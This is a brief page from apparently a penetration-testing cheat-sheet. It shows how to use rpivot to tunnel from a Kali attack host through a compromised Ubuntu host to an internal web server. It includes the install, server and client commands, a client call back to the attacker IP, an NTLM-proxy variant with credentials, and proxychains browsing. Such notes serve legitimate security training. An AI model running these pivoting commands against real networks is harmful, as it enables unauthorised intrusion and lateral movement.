RPivot

Webserver pivoting

Assume: Kali -> Victim (Ubuntu) -> Victim (Web server)

Installing rpivot

$ sudo git clone https://github.com/klsecservices/rpivot.git
$ sudo apt-get install python2.7

Running rpivot from Attack Host

$ python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

Running rpivot from Pivot Host (Ubuntu)

$ python2.7 client.py --server-ip 10.10.15.5 --server-port 9999

Using HTTP-Proxy and NTLM Auth

Some organizations have http proxy and ntlm auth ocnfigured with the domain controller

$ python2.7 client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>

Browsing the webserver using proxychains (Kali)

$ proxychains firefox-esr 172.16.5.135:80

PreviousSShuttleNextNetsh

Last updated